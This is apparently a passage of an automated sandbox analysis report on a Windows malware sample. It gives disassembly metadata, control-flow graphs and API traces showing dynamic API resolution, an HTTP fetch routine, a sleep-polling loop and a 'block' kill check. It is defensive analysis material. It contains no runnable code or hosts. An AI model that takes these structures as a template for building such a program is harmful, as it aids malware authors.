                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 1f2cbb55af4a5cdfa91742c59b2d0e02f2e4476cb324553e0c86f8c76b0986ab
                  • Instruction ID: 74021b5770494b70588dec21e760980f2e89a2f5fc4d6dc56101042a421dc974
                  • Opcode Fuzzy Hash: 1f2cbb55af4a5cdfa91742c59b2d0e02f2e4476cb324553e0c86f8c76b0986ab
                  • Instruction Fuzzy Hash: 53F04FB1944609AFCB14DF98DD4ABAEBBFCEB45711F10025AFA05A2690C77415448BA2
                  Function 00131160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 84b3c75c93d57419d285ec096d741b38ccf0639807eefc44448c32198e5a53a0
                  • Instruction ID: dc551ebacf296e1888098f3113781ceedd188862ca484f7205b7a6de79132d49
                  • Opcode Fuzzy Hash: 84b3c75c93d57419d285ec096d741b38ccf0639807eefc44448c32198e5a53a0
                  • Instruction Fuzzy Hash: 9AD09E7490430CDBCB14DFE0D9496EDBB7CFB48716F101559DD0962340EB3155D6CAA6
                  Function 00149C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 149c10-149c1a 634 14a036-14a0ca LoadLibraryA * 8 633->634 635 149c20-14a031 GetProcAddress * 43 633->635 636 14a146-14a14d 634->636 637 14a0cc-14a141 GetProcAddress * 5 634->637 635->634 638 14a216-14a21d 636->638 639 14a153-14a211 GetProcAddress * 8 636->639 637->636 640 14a21f-14a293 GetProcAddress * 5 638->640 641 14a298-14a29f 638->641 639->638 640->641 642 14a2a5-14a332 GetProcAddress * 6 641->642 643 14a337-14a33e 641->643 642->643 644 14a344-14a41a GetProcAddress * 9 643->644 645 14a41f-14a426 643->645 644->645 646 14a4a2-14a4a9 645->646 647 14a428-14a49d GetProcAddress * 5 645->647 648 14a4dc-14a4e3 646->648 649 14a4ab-14a4d7 GetProcAddress * 2 646->649 647->646 650 14a515-14a51c 648->650 651 14a4e5-14a510 GetProcAddress * 2 648->651 649->648 652 14a612-14a619 650->652 653 14a522-14a60d GetProcAddress * 10 650->653 651->650 654 14a67d-14a684 652->654 655 14a61b-14a678 GetProcAddress * 4 652->655 653->652 656 14a686-14a699 GetProcAddress 654->656 657 14a69e-14a6a5 654->657 655->654 656->657 658 14a6a7-14a703 GetProcAddress * 4 657->658 659 14a708-14a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(75900000,01016740), ref: 00149C2D
                  • GetProcAddress.KERNEL32(75900000,01016A20), ref: 00149C45
                  • GetProcAddress.KERNEL32(75900000,01028F10), ref: 00149C5E
                  • GetProcAddress.KERNEL32(75900000,01028FA0), ref: 00149C76
                  • GetProcAddress.KERNEL32(75900000,0102CA48), ref: 00149C8E
                  • GetProcAddress.KERNEL32(75900000,0102C9E8), ref: 00149CA7
                  • GetProcAddress.KERNEL32(75900000,0101B298), ref: 00149CBF
                  • GetProcAddress.KERNEL32(75900000,0102CA00), ref: 00149CD7
                  • GetProcAddress.KERNEL32(75900000,0102C8B0), ref: 00149CF0
                  • GetProcAddress.KERNEL32(75900000,0102C9A0), ref: 00149D08
                  • GetProcAddress.KERNEL32(75900000,0102C970), ref: 00149D20
                  • GetProcAddress.KERNEL32(75900000,010169A0), ref: 00149D39
                  • GetProcAddress.KERNEL32(75900000,010168C0), ref: 00149D51
                  • GetProcAddress.KERNEL32(75900000,01016680), ref: 00149D69
                  • GetProcAddress.KERNEL32(75900000,010166E0), ref: 00149D82
                  • GetProcAddress.KERNEL32(75900000,0102C8C8), ref: 00149D9A
                  • GetProcAddress.KERNEL32(75900000,0102C7F0), ref: 00149DB2
                  • GetProcAddress.KERNEL32(75900000,0101B0E0), ref: 00149DCB
                  • GetProcAddress.KERNEL32(75900000,01016860), ref: 00149DE3
                  • GetProcAddress.KERNEL32(75900000,0102CA18), ref: 00149DFB
                  • GetProcAddress.KERNEL32(75900000,0102C988), ref: 00149E14
                  • GetProcAddress.KERNEL32(75900000,0102C880), ref: 00149E2C
                  • GetProcAddress.KERNEL32(75900000,0102C8F8), ref: 00149E44
                  • GetProcAddress.KERNEL32(75900000,01016780), ref: 00149E5D
                  • GetProcAddress.KERNEL32(75900000,0102CA60), ref: 00149E75
                  • GetProcAddress.KERNEL32(75900000,0102CAC0), ref: 00149E8D
                  • GetProcAddress.KERNEL32(75900000,0102CA78), ref: 00149EA6
                  • GetProcAddress.KERNEL32(75900000,0102CA90), ref: 00149EBE
                  • GetProcAddress.KERNEL32(75900000,0102CAD8), ref: 00149ED6
                  • GetProcAddress.KERNEL32(75900000,0102C9B8), ref: 00149EEF
                  • GetProcAddress.KERNEL32(75900000,0102CAA8), ref: 00149F07
                  • GetProcAddress.KERNEL32(75900000,0102C958), ref: 00149F1F
                  • GetProcAddress.KERNEL32(75900000,0102C808), ref: 00149F38
                  • GetProcAddress.KERNEL32(75900000,01029978), ref: 00149F50
                  • GetProcAddress.KERNEL32(75900000,0102C9D0), ref: 00149F68
                  • GetProcAddress.KERNEL32(75900000,0102C928), ref: 00149F81
                  • GetProcAddress.KERNEL32(75900000,010168E0), ref: 00149F99
                  • GetProcAddress.KERNEL32(75900000,0102C910), ref: 00149FB1
                  • GetProcAddress.KERNEL32(75900000,01016900), ref: 00149FCA
                  • GetProcAddress.KERNEL32(75900000,0102C8E0), ref: 00149FE2
                  • GetProcAddress.KERNEL32(75900000,0102C868), ref: 00149FFA
                  • GetProcAddress.KERNEL32(75900000,010165E0), ref: 0014A013
                  • GetProcAddress.KERNEL32(75900000,010164C0), ref: 0014A02B
                  • LoadLibraryA.KERNEL32(0102CA30,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A03D
                  • LoadLibraryA.KERNEL32(0102C820,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A04E
                  • LoadLibraryA.KERNEL32(0102C838,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A060
                  • LoadLibraryA.KERNEL32(0102C850,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A072
                  • LoadLibraryA.KERNEL32(0102C898,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A083
                  • LoadLibraryA.KERNEL32(0102C940,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A095
                  • LoadLibraryA.KERNEL32(0102CC28,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A0A7
                  • LoadLibraryA.KERNEL32(0102CBF8,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A0B8
                  • GetProcAddress.KERNEL32(75FD0000,01016600), ref: 0014A0DA
                  • GetProcAddress.KERNEL32(75FD0000,0102CC40), ref: 0014A0F2
                  • GetProcAddress.KERNEL32(75FD0000,01028B60), ref: 0014A10A
                  • GetProcAddress.KERNEL32(75FD0000,0102CDA8), ref: 0014A123
                  • GetProcAddress.KERNEL32(75FD0000,01016380), ref: 0014A13B
                  • GetProcAddress.KERNEL32(73B60000,0101B090), ref: 0014A160
                  • GetProcAddress.KERNEL32(73B60000,01016620), ref: 0014A179
                  • GetProcAddress.KERNEL32(73B60000,0101AE88), ref: 0014A191
                  • GetProcAddress.KERNEL32(73B60000,0102CC70), ref: 0014A1A9
                  • GetProcAddress.KERNEL32(73B60000,0102CD78), ref: 0014A1C2
                  • GetProcAddress.KERNEL32(73B60000,01016520), ref: 0014A1DA
                  • GetProcAddress.KERNEL32(73B60000,010162E0), ref: 0014A1F2
                  • GetProcAddress.KERNEL32(73B60000,0102CDC0), ref: 0014A20B
                  • GetProcAddress.KERNEL32(763B0000,010164E0), ref: 0014A22C
                  • GetProcAddress.KERNEL32(763B0000,01016300), ref: 0014A244
                  • GetProcAddress.KERNEL32(763B0000,0102CC58), ref: 0014A25D
                  • GetProcAddress.KERNEL32(763B0000,0102CD00), ref: 0014A275
                  • GetProcAddress.KERNEL32(763B0000,010165A0), ref: 0014A28D
                  • GetProcAddress.KERNEL32(750F0000,0101B2E8), ref: 0014A2B3
                  • GetProcAddress.KERNEL32(750F0000,0101B1A8), ref: 0014A2CB
                  • GetProcAddress.KERNEL32(750F0000,0102CD48), ref: 0014A2E3
                  • GetProcAddress.KERNEL32(750F0000,010164A0), ref: 0014A2FC
                  • GetProcAddress.KERNEL32(750F0000,010163A0), ref: 0014A314
                  • GetProcAddress.KERNEL32(750F0000,0101B0B8), ref: 0014A32C
                  • GetProcAddress.KERNEL32(75A50000,0102CC88), ref: 0014A352
                  • GetProcAddress.KERNEL32(75A50000,01016500), ref: 0014A36A
                  • GetProcAddress.KERNEL32(75A50000,01028B70), ref: 0014A382
                  • GetProcAddress.KERNEL32(75A50000,0102CB20), ref: 0014A39B
                  • GetProcAddress.KERNEL32(75A50000,0102CBE0), ref: 0014A3B3
                  • GetProcAddress.KERNEL32(75A50000,01016580), ref: 0014A3CB
                  • GetProcAddress.KERNEL32(75A50000,01016320), ref: 0014A3E4
                  • GetProcAddress.KERNEL32(75A50000,0102CB98), ref: 0014A3FC
                  • GetProcAddress.KERNEL32(75A50000,0102CCA0), ref: 0014A414
                  • GetProcAddress.KERNEL32(75070000,01016640), ref: 0014A436
                  • GetProcAddress.KERNEL32(75070000,0102CDD8), ref: 0014A44E
                  • GetProcAddress.KERNEL32(75070000,0102CCB8), ref: 0014A466
                  • GetProcAddress.KERNEL32(75070000,0102CD60), ref: 0014A47F
                  • GetProcAddress.KERNEL32(75070000,0102CCD0), ref: 0014A497
                  • GetProcAddress.KERNEL32(74E50000,01016360), ref: 0014A4B8
                  • GetProcAddress.KERNEL32(74E50000,01016480), ref: 0014A4D1
                  • GetProcAddress.KERNEL32(75320000,010162A0), ref: 0014A4F2
                  • GetProcAddress.KERNEL32(75320000,0102CB38), ref: 0014A50A
                  • GetProcAddress.KERNEL32(6F060000,010163C0), ref: 0014A530
                  • GetProcAddress.KERNEL32(6F060000,010165C0), ref: 0014A548
                  • GetProcAddress.KERNEL32(6F060000,01016660), ref: 0014A560
                  • GetProcAddress.KERNEL32(6F060000,0102CB68), ref: 0014A579
                  • GetProcAddress.KERNEL32(6F060000,01016540), ref: 0014A591
                  • GetProcAddress.KERNEL32(6F060000,01016280), ref: 0014A5A9
                  • GetProcAddress.KERNEL32(6F060000,010162C0), ref: 0014A5C2
                  • GetProcAddress.KERNEL32(6F060000,01016340), ref: 0014A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0014A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0014A607
                  • GetProcAddress.KERNEL32(74E00000,0102CAF0), ref: 0014A629
                  • GetProcAddress.KERNEL32(74E00000,01028B80), ref: 0014A641
                  • GetProcAddress.KERNEL32(74E00000,0102CCE8), ref: 0014A659
                  • GetProcAddress.KERNEL32(74E00000,0102CD30), ref: 0014A672
                  • GetProcAddress.KERNEL32(74DF0000,01016560), ref: 0014A693
                  • GetProcAddress.KERNEL32(6F9A0000,0102CD18), ref: 0014A6B4
                  • GetProcAddress.KERNEL32(6F9A0000,010163E0), ref: 0014A6CD
                  • GetProcAddress.KERNEL32(6F9A0000,0102CBB0), ref: 0014A6E5
                  • GetProcAddress.KERNEL32(6F9A0000,0102CD90), ref: 0014A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 78c6f46f7af1c02bd81f6ae5adfc65c624c5f781c266cba0f6fae1f2f7bb45a3
                  • Instruction ID: 4b4474326265ba3c079bd4485aaf1a841c88b12c63f87528797ed19aa4af50a0
                  • Opcode Fuzzy Hash: 78c6f46f7af1c02bd81f6ae5adfc65c624c5f781c266cba0f6fae1f2f7bb45a3
                  • Instruction Fuzzy Hash: 086249B5504A80AFD36ADFA8ED8995E3BFDE7CC301B14851AA61DC3224D63998C1DF13
                  Function 00136280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 136280-13630b call 14a7a0 call 1347b0 call 14a740 InternetOpenA StrCmpCA 1040 136314-136318 1033->1040 1041 13630d 1033->1041 1042 136509-136525 call 14a7a0 call 14a800 * 2 1040->1042 1043 13631e-136342 InternetConnectA 1040->1043 1041->1040 1062 136528-13652d 1042->1062 1045 136348-13634c 1043->1045 1046 1364ff-136503 InternetCloseHandle 1043->1046 1048 13635a 1045->1048 1049 13634e-136358 1045->1049 1046->1042 1051 136364-136392 HttpOpenRequestA 1048->1051 1049->1051 1053 1364f5-1364f9 InternetCloseHandle 1051->1053 1054 136398-13639c 1051->1054 1053->1046 1056 1363c5-136405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 13639e-1363bf InternetSetOptionA 1054->1057 1058 136407-136427 call 14a740 call 14a800 * 2 1056->1058 1059 13642c-13644b call 148940 1056->1059 1057->1056 1058->1062 1067 1364c9-1364e9 call 14a740 call 14a800 * 2 1059->1067 1068 13644d-136454 1059->1068 1067->1062 1071 1364c7-1364ef InternetCloseHandle 1068->1071 1072 136456-136480 InternetReadFile 1068->1072 1071->1053 1076 136482-136489 1072->1076 1077 13648b 1072->1077 1076->1077 1080 13648d-1364c5 call 14a9b0 call 14a8a0 call 14a800 1076->1080 1077->1071 1080->1072
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • InternetOpenA.WININET(00150DFE,00000001,00000000,00000000,00000000), ref: 001362E1
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 00136303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00136335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00136385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001363BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001363D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001363FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0013646D
                  • InternetCloseHandle.WININET(00000000), ref: 001364EF
                  • InternetCloseHandle.WININET(00000000), ref: 001364F9
                  • InternetCloseHandle.WININET(00000000), ref: 00136503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 65e4050e43ba6362e3baa4f600be03644e3b488edc70a561d41b533522fff7ef
                  • Instruction ID: bf9448f6e33ece6a5851869305780d8e3c5534b4b2308597ed977b9574daa45d
                  • Opcode Fuzzy Hash: 65e4050e43ba6362e3baa4f600be03644e3b488edc70a561d41b533522fff7ef
                  • Instruction Fuzzy Hash: 85713B71A40218EBEB25DFA0CC49BEE77B8FF44701F508198F50A6B190DBB56A85CF52
                  Function 00145510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 145510-145577 call 145ad0 call 14a820 * 3 call 14a740 * 4 1106 14557c-145583 1090->1106 1107 145585-1455b6 call 14a820 call 14a7a0 call 131590 call 1451f0 1106->1107 1108 1455d7-14564c call 14a740 * 2 call 131590 call 1452c0 call 14a8a0 call 14a800 call 14aad0 StrCmpCA 1106->1108 1123 1455bb-1455d2 call 14a8a0 call 14a800 1107->1123 1134 145693-1456a9 call 14aad0 StrCmpCA 1108->1134 1138 14564e-14568e call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1108->1138 1123->1134 1139 1457dc-145844 call 14a8a0 call 14a820 * 2 call 131670 call 14a800 * 4 call 146560 call 131550 1134->1139 1140 1456af-1456b6 1134->1140 1138->1134 1271 145ac3-145ac6 1139->1271 1142 1456bc-1456c3 1140->1142 1143 1457da-14585f call 14aad0 StrCmpCA 1140->1143 1146 1456c5-145719 call 14a820 call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1142->1146 1147 14571e-145793 call 14a740 * 2 call 131590 call 1452c0 call 14a8a0 call 14a800 call 14aad0 StrCmpCA 1142->1147 1161 145865-14586c 1143->1161 1162 145991-1459f9 call 14a8a0 call 14a820 * 2 call 131670 call 14a800 * 4 call 146560 call 131550 1143->1162 1146->1143 1147->1143 1250 145795-1457d5 call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1147->1250 1168 145872-145879 1161->1168 1169 14598f-145a14 call 14aad0 StrCmpCA 1161->1169 1162->1271 1175 1458d3-145948 call 14a740 * 2 call 131590 call 1452c0 call 14a8a0 call 14a800 call 14aad0 StrCmpCA 1168->1175 1176 14587b-1458ce call 14a820 call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1168->1176 1198 145a16-145a21 Sleep 1169->1198 1199 145a28-145a91 call 14a8a0 call 14a820 * 2 call 131670 call 14a800 * 4 call 146560 call 131550 1169->1199 1175->1169 1274 14594a-14598a call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1143 1274->1169
                  APIs
                    • Part of subcall function 0014A820: lstrlen.KERNEL32(00134F05,?,?,00134F05,00150DDE), ref: 0014A82B
                    • Part of subcall function 0014A820: lstrcpy.KERNEL32(00150DDE,00000000), ref: 0014A885
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001456A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145857
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145228
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 001452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145318
                    • Part of subcall function 001452C0: lstrlen.KERNEL32(00000000), ref: 0014532F
                    • Part of subcall function 001452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00145364
                    • Part of subcall function 001452C0: lstrlen.KERNEL32(00000000), ref: 00145383
                    • Part of subcall function 001452C0: lstrlen.KERNEL32(00000000), ref: 001453AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0014578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00145A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: b6d8f0f54bbe9b5ab54115c86c6842c62ea4507774153439c237367a6395d230
                  • Instruction ID: 4e5331f6379c0b87019dd79af96d37a955b75db4bcaa72383634c83899cf45e1
                  • Opcode Fuzzy Hash: b6d8f0f54bbe9b5ab54115c86c6842c62ea4507774153439c237367a6395d230
                  • Instruction Fuzzy Hash: 1FE16172950504ABDB15FBB0DC52EED737DAFA4301F918128B406670B2EF346A4DCB92
                  Function 001417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 1417a0-1417cd call 14aad0 StrCmpCA 1304 1417d7-1417f1 call 14aad0 1301->1304 1305 1417cf-1417d1 ExitProcess 1301->1305 1309 1417f4-1417f8 1304->1309 1310 1419c2-1419cd call 14a800 1309->1310 1311 1417fe-141811 1309->1311 1313 141817-14181a 1311->1313 1314 14199e-1419bd 1311->1314 1316 141835-141844 call 14a820 1313->1316 1317 141970-141981 StrCmpCA 1313->1317 1318 1418f1-141902 StrCmpCA 1313->1318 1319 141951-141962 StrCmpCA 1313->1319 1320 141932-141943 StrCmpCA 1313->1320 1321 141913-141924 StrCmpCA 1313->1321 1322 14185d-14186e StrCmpCA 1313->1322 1323 14187f-141890 StrCmpCA 1313->1323 1324 141821-141830 call 14a820 1313->1324 1325 1418ad-1418be StrCmpCA 1313->1325 1326 1418cf-1418e0 StrCmpCA 1313->1326 1327 14198f-141999 call 14a820 1313->1327 1328 141849-141858 call 14a820 1313->1328 1314->1309 1316->1314 1349 141983-141986 1317->1349 1350 14198d 1317->1350 1340 141904-141907 1318->1340 1341 14190e 1318->1341 1346 141964-141967 1319->1346 1347 14196e 1319->1347 1344 141945-141948 1320->1344 1345 14194f 1320->1345 1342 141926-141929 1321->1342 1343 141930 1321->1343 1332 141870-141873 1322->1332 1333 14187a 1322->1333 1334 141892-14189c 1323->1334 1335 14189e-1418a1 1323->1335 1324->1314 1336 1418c0-1418c3 1325->1336 1337 1418ca 1325->1337 1338 1418e2-1418e5 1326->1338 1339 1418ec 1326->1339 1327->1314 1328->1314 1332->1333 1333->1314 1354 1418a8 1334->1354 1335->1354 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1354->1314
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 001417C5
                  • ExitProcess.KERNEL32 ref: 001417D1
                  Strings
                  Memory Dump Source
